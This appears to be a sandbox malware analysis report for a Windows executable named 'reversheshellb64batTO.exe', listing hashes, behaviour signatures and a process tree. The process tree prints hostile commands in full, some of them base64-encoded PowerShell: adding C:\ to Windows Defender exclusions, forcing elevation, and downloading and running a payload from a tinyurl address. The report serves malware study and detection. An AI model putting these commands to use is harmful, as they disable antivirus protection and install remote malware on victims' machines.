Overview

overview

10

Static

static

3

revershesh...TO.exe

windows7-x64

10

revershesh...TO.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30/03/2025, 12:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    reversheshellb64batTO.exe

  • Size

    88KB

  • MD5

    aa8d4f9a7cea9c7c8de61478ae5a7f81

  • SHA1

    5b8ce5f94b702731877e55822dfb505af4332fa6

  • SHA256

    cb89e6fafecf411a75df6cb06b2302e8f3c9696232dbdff6b25b3d6bec635c91

  • SHA512

    2f54a16ad0a7a0ec8c6ea4f08cd28c587a6ac29421ec1433150e80e164d48bdd312480a86b15477deee4e11f3cf331823400a9fc858451fc4eaf59213577c982

  • SSDEEP

    1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf3xP+:fq6+ouCpk2mpcWJ0r+QNTBf3B+

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://tinyurl.com/VIRGPLOAD

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Start PowerShell.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe
    "C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2084
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8749.tmp\874A.tmp\874B.bat C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1644
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w h -command ""
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2524
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe' -ArgumentList 'am_admin'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2340
        • C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe
          "C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe" am_admin
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2828
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8C77.tmp\8C78.tmp\8C79.bat C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe am_admin"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2860
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -w h -command ""
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1824
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2824
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2772
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:492
              • C:\Windows\system32\reg.exe
                "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
                7⤵
                  PID:324
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB0AGkAbgB5AHUAcgBsAC4AYwBvAG0ALwBWAEkAUgBHAFAATABPAEEARAAiAA0ACgAkAG8AdQB0AHAAdQB0ACAAPQAgACIAJABlAG4AdgA6AFQAZQBtAHAALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAG8AdQB0AHAAdQB0AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAG8AdQB0AHAAdQB0AA==
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:584

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\8749.tmp\874A.tmp\874B.bat
      Filesize

      1KB

      MD5

      67ce8577d16577bede59e604f52ec2de

      SHA1

      c0a7b9d0f0082d227a2e9ae125c09afa08b30ec6

      SHA256

      1cf31abdbb120a1449dd41cbdcf6a183f136dfb525c255c9a5793df5c5a84ba6

      SHA512

      a2491767e88064922bfc42740ec983b04097339cac9fdb93e11cc1fd6344ad52a4bb1cadb3a0a7e11578d84b4ce4da85b04388ba72c620b425a824d70e2fcd3e

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      fee04de97614d6d228a0e3a16f726557

      SHA1

      226305dff59bb7a4befc40bbd053fe4a0ebb105b

      SHA256

      5203d258efcdde6d13c6db072bbc5cc9bebb67d7be365b865779e4ba57172f8c

      SHA512

      c550e203866793078dd74ea084758164d5ca308985733db5233f0a6015fb091cb6a1cb5767cd16d440a8c8904289e856bf060b0fc63697e80be2ed12c6dfcb3b

      Download Submit

    • memory/2340-16-0x000000001B660000-0x000000001B942000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2340-17-0x0000000001D20000-0x0000000001D28000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2524-6-0x000007FEF555E000-0x000007FEF555F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2524-7-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2524-8-0x0000000001D90000-0x0000000001D98000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2524-9-0x0000000002F64000-0x0000000002F67000-memory.dmp

      Filesize

      12KB

      Download

    • memory/2524-10-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

      Filesize

      9.6MB

      Download